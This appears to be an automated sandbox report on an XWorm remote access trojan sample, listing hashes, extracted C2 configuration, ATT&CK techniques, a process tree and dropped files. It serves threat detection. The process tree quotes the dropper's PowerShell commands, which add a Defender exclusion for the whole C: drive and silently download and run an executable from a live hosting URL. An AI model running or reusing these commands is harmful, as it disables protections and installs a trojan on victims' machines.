xworm | 90a5459c95036aace6e45f9357ad5577ba1265a5a18cbe8e1094726b5299fae5

Analysis

max time kernel
300s
max time network
298s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
16-11-2024 18:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sample.zip
Size

302KB
MD5

9e8a086ef12dda4f5e4bca642526fce6
SHA1

60ee913f968da1db1274cd51a3438523123232f4
SHA256

90a5459c95036aace6e45f9357ad5577ba1265a5a18cbe8e1094726b5299fae5
SHA512

83bbd190667aae5c9a2c01087457ae63227dff3ada7e459223198f95d68ff85b499ee3668c87380ff16d866d8e4d0e30d7105bffec0f368c3a46db74c07e01cb
SSDEEP

6144:tMqXFIbKXyoc5NwK9RscAVGwNvb/Trn6yj14y0nj7IUto8u9iEOv7J1B47m7oQ7:i0FZcfweRscbwN7TrnV1Ij7f1YiEOVLL

Score

10^/10

xworm discovery execution rat trojan

Malware Config

Extracted

Family

xworm

https://pastebin.com/raw/L3Xphr0J:201770

Attributes

install_file
Prefetch Manager.exe
pastebin_url
https://pastebin.com/raw/L3Xphr0J

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0009000000023ce2-49.dat	family_xworm
behavioral2/memory/1628-60-0x00000000002C0000-0x00000000002D6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
38	5080	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4892	powershell.exe
5080	powershell.exe
5080	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	tmp.exe
Key value queried	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation	tmp.exe

Executes dropped EXE 5 IoCs

pid	Process
4144	tmp.exe
1628	chdu.exe
2660	tmp.exe
1436	chdu.exe
4712	ForceAdmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
44	pastebin.com
45	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
40	ip-api.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
100	timeout.exe
1160	timeout.exe
1368	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings	msedge.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4764	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4892	powershell.exe
4892	powershell.exe
5080	powershell.exe
5080	powershell.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
2136	msedge.exe
2136	msedge.exe
3756	msedge.exe
3756	msedge.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
3456	identity_helper.exe
3456	identity_helper.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1484	msedge.exe
1484	msedge.exe
1628	chdu.exe
1628	chdu.exe
3832	msedge.exe
3832	msedge.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe
1628	chdu.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1628	chdu.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeRestorePrivilege	4044	7zFM.exe
Token: 35	4044	7zFM.exe
Token: SeSecurityPrivilege	4044	7zFM.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	5080	powershell.exe
Token: SeDebugPrivilege	4144	tmp.exe
Token: SeDebugPrivilege	1628	chdu.exe
Token: SeDebugPrivilege	1628	chdu.exe
Token: SeDebugPrivilege	2660	tmp.exe
Token: SeDebugPrivilege	1436	chdu.exe

Suspicious use of FindShellTrayWindow 44 IoCs

pid	Process
4044	7zFM.exe
4044	7zFM.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe
3756	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1628	chdu.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2380 wrote to memory of 4892	2380	cmd.exe	113
PID 2380 wrote to memory of 4892	2380	cmd.exe	113
PID 2380 wrote to memory of 5080	2380	cmd.exe	114
PID 2380 wrote to memory of 5080	2380	cmd.exe	114
PID 5080 wrote to memory of 4144	5080	powershell.exe	116
PID 5080 wrote to memory of 4144	5080	powershell.exe	116
PID 4144 wrote to memory of 1628	4144	tmp.exe	118
PID 4144 wrote to memory of 1628	4144	tmp.exe	118
PID 4144 wrote to memory of 4660	4144	tmp.exe	119
PID 4144 wrote to memory of 4660	4144	tmp.exe	119
PID 4660 wrote to memory of 100	4660	cmd.exe	121
PID 4660 wrote to memory of 100	4660	cmd.exe	121
PID 3756 wrote to memory of 2032	3756	msedge.exe	126
PID 3756 wrote to memory of 2032	3756	msedge.exe	126
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 4836	3756	msedge.exe	127
PID 3756 wrote to memory of 2136	3756	msedge.exe	128
PID 3756 wrote to memory of 2136	3756	msedge.exe	128
PID 3756 wrote to memory of 4204	3756	msedge.exe	129
PID 3756 wrote to memory of 4204	3756	msedge.exe	129
PID 3756 wrote to memory of 4204	3756	msedge.exe	129
PID 3756 wrote to memory of 4204	3756	msedge.exe	129
PID 3756 wrote to memory of 4204	3756	msedge.exe	129
PID 3756 wrote to memory of 4204	3756	msedge.exe	129
PID 3756 wrote to memory of 4204	3756	msedge.exe	129
PID 3756 wrote to memory of 4204	3756	msedge.exe	129

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\sample.zip"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4044

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4908

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\sample\dropper.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:2380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command Invoke-WebRequest https://file.garden/ZyuCb9V1JUxg3En4/tmp -Outfile C:\ProgramData\tmp.exe; Start-Process C:\ProgramData\tmp.exe
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5080
- - C:\ProgramData\tmp.exe
    "C:\ProgramData\tmp.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4144
  - - C:\ProgramData\chdu.exe
      "C:\ProgramData\chdu.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:1628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp310A.tmp.bat""
        5⤵
        
        PID:1316
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:1368
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp8846.tmp.bat""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4660
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:100

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Desktop\sample\dropper.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:4764

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff984a646f8,0x7ff984a64708,0x7ff984a64718
  2⤵
  PID:2032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2044 /prefetch:2
  2⤵
  PID:4836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2604 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
  2⤵
  PID:4204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:2272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1
  2⤵
  PID:2616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3452 /prefetch:1
  2⤵
  PID:2736
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8
  2⤵
  PID:4168
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5596 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4036 /prefetch:8
  2⤵
  PID:4380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4240 /prefetch:1
  2⤵
  PID:1696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5888 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
  2⤵
  PID:616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2020,7774414647165287767,17515716600476967132,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3392 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3832

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5080

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4600

C:\Users\Admin\Desktop\sample\tmp.exe
"C:\Users\Admin\Desktop\sample\tmp.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2660
- C:\Users\Admin\Desktop\sample\chdu.exe
  "C:\Users\Admin\Desktop\sample\chdu.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1436
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp42FB.tmp.bat""
  2⤵
  PID:2708
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1160

C:\Users\Admin\Desktop\sample\ForceAdmin.exe
"C:\Users\Admin\Desktop\sample\ForceAdmin.exe"
1⤵
- Executes dropped EXE
PID:4712
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5jpcznnv\5jpcznnv.cmdline"
  2⤵
  PID:3200
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES42F1.tmp" "c:\Users\Admin\Desktop\sample\CSCF6E0CA01C14B4FCCBC45432B8BC715C0.TMP"
    3⤵
    PID:2940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\chdu.exe

Filesize
59KB

MD5
7868c373824e06e1a120d4d89a4ad78d

SHA1
175376c3fc41ff8389984a42a83ff8d07714631e

SHA256
430ea3bd2e16313514e53fed42c14dbcf57ac27f5fc9a39edbe3fe5c15168da4

SHA512
09b55d51f79ed584c8f983eb5cf83f38790b9680c5073f552d672c647387168898c1d2ff3792e574075badb16c74b48f26c232f49caf16966be1e877287ddfcc

Download Submit
C:\ProgramData\tmp.exe

Filesize
49KB

MD5
13b33a68348b989164778abd55cf0d25

SHA1
dc455efebd75a1bbc26a1574aa113b6f32fa9e0d

SHA256
58b4b6ef8e2c82a798fee5d29118704f2007a4626aa817b058e0e1d41b4a4537

SHA512
f223b8c197a38f3ece65d55cf161a64d8ba8693e1cbd553ba4a2e1ab396c0722763bf6393721f8ba7a0c23a9593e130f8c32d860eae8558d3f8c16b142716fa8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chdu.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tmp.exe.log

Filesize
1KB

MD5
b4a7ddd6b0d75759b383d8cffa983dba

SHA1
52dc22b74dfb7d6dd3abd2f4f2553d53eb9ed04b

SHA256
987a6b7710843098a2f4bb6d369ba6c4001c83d6507e4e541223c4f67a898cf6

SHA512
2a7ab2f995ed4436f16c3d132b462cb0fb3a73efedebc3cd8252e5e52227b3b0eae06a596894fbf5e9beda2b9e2d2ed274be52a2bfb6e288f1b4ec5db9fb58f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
d7cb450b1315c63b1d5d89d98ba22da5

SHA1
694005cd9e1a4c54e0b83d0598a8a0c089df1556

SHA256
38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031

SHA512
df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
37f660dd4b6ddf23bc37f5c823d1c33a

SHA1
1c35538aa307a3e09d15519df6ace99674ae428b

SHA256
4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8

SHA512
807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
249B

MD5
bd76d5710e63fbd34bddf473bd48a593

SHA1
4338c636f7a56c25b09f9fd0f959fff9b0d98e5f

SHA256
943042ca6a47525be5e28252db476a9d03f8467fbe925804c7743b98262a5de3

SHA512
054ac7f7a69a6222bfb9cce31a69377ac4288de19cd9027d753e1fa17595b0c2196bfd900617f1f044f9b085ec7a40bf9a359af3c8fc5986323ca62f45498050

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
d1eccfbfe4f3384c949d9594ff6df5b4

SHA1
4c49bbc702638b8367528fd8e6559ee6ea8cecde

SHA256
4259500e990487d340ef626844922fbb07d9092fecba90bcd49e4fbb65eada0f

SHA512
81016d873e1728c61e8e5e19341daa94d14db9b9724287ae5ca3fdc7a2371c6c50e1ef52eca255d007097cd0f2b8ff40bd236ff29aa753d88997fc6fb8e736c9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
fc8170dc039a6d831e5327bb220f27af

SHA1
612e23484be4ae4eb5c06070d291aa5c286bf25c

SHA256
644038b0166e45555332f105cdc41a8f1386d072564a303dd1fe567dd73750db

SHA512
c39b49f11e5c41f3c25d72a0829fbf1afb3ea95999cacc4f500200b4c92d2e68681d42c03715e26a504c13e64886bcc469372f8fee32729f4facb138e586cf7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
b4cb2ff5a14c08e2b88fae4e6ee6eaad

SHA1
4cdbf85af84a7809963c6b5db83af53d89a25223

SHA256
858dab9bd26ab9fb224c1bd94f2a4253b11fad2b5bf99c7996a3fa42654cbe5d

SHA512
2e1bf8e32aa98a2fa17649c3c0b0a398f2a2b376ee6cae7995c28ba54407dfdd95e59c1eff8b870ff60724db03ae38dc7a1cad38e0d77c9c2dc3fb959e655de2

Download Submit
